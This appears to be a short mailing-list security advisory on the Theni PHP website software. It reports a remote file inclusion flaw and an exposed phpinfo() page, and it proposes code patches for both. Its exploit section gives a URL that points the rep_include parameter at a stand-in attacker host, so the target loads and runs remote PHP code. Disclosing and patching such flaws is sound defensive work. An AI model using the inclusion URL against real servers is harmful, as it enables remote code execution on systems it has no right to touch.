Informations :
°°°°°°°°°°°°°°
Version : ?
Website : http://www.theni.freesurf.fr
Problems :
- Include file
- phpinfo()

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/admin_t/include/aff_liste_langue.php :
-----------------------------------------
require ($rep_include."para_langue.php");
-----------------------------------------

/admin_t/include/find_theni_home.php :
--------------
<html>
<body>
<?
phpinfo();
?>
</body></html>
--------------

Exploits :
°°°°°°°°°°
-
http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/
with :
http://[attacker]/para_langue.php

(This will work only if register_globals=ON)

- http://[target]/admin_t/include/find_theni_home.php

Patchs :
°°°°°°°°
In admin_t/include/aff_liste_langue.php, replace the line :
-----------------------------------------
require ($rep_include."para_langue.php");
-----------------------------------------
by :
-------------------------------------------------
if (file_exists($rep_include."para_langue.php")){
require ($rep_include."para_langue.php");
}
-------------------------------------------------

&

To replace the file /admin_t/include/find_theni_home.php by :
--------------------------------------------------------------
<?
session_start();
if (session_is_registered("USER")==FALSE or $USER[id_user]<1){
exit;
} else {
echo "<html>";
echo "<body>";
phpinfo();
echo "</body></html>";
}
?>
--------------------------------------------------------------

A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/E-theni.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-mn

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]